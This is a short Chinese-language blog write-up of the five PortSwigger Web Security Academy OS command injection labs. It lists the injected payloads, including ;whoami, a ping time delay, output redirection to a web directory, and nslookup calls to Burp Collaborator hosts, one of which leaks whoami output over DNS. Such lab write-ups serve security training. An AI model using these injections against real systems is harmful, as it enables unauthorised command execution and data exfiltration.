-
BurpSuit官方实验室之命令注入
BurpSuit官方实验室之命令注入
这是BurpSuit官方的实验室靶场,以下将记录个人命令注入共5个Lab的通关过程
Web Security Academy: Free Online Training from PortSwigger
lab1:
OS command injection, simple case操作系统命令注入,简单情况
找到了product/stock接口
在参数后加
;whoami或者|whoami
lab2:
Blind OS command injection with time delays具有时间延迟的盲操作系统命令注入
有一个反馈界面
点击提交反馈,发送如下请求包
在email后加入
||ping+-c+10+127.0.0.1||延迟10s
lab3:
Blind OS command injection with output redirection带输出重定向的盲操作系统命令注入
还是反馈页面,这次是重定向
email中加入
||whoami>/var/www/images/tpa1.txt||
访问如下静态页面
成功获得whoami
lab4:
Blind OS command injection with out-of-band interaction带外交互的盲操作系统命令注入
开启 Burp Collaborator
emai后加
||nslookup+i1kvr4nt6vbxx0nevocnxy2qmhs8gx.burpcollaborator.net||DNS地址
lab5:
Blind OS command injection with out-of-band data exfiltration带外数据渗透的盲目操作系统命令注入
email加||nslookup+
whoami.ek2qiy6xgp12mh15lgrgk8m85zbpze.burpcollaborator.net||注意whoami左右要加`
-
相关阅读:
Spring MVC的常用注解及用法
GITEE 基于OAuth2的API V5版本
JVM中的堆的新生代、老年代、永久代
web前端设计与开发期末作品_期末大作业【使用HTML制作汽车首页】
Springboot整合ElasticSearch
【算法-动态规划】最长公共子序列
MyBatis 配置与测试方式
nodejs的下载安装
代码随想录算法训练营20期|第五十七天|动态规划part15|● 392.判断子序列 ● 115.不同的子序列
美图SaaS、有赞美业,求同存异的差异化角逐
- 原文地址:https://blog.csdn.net/qq_18980147/article/details/127851356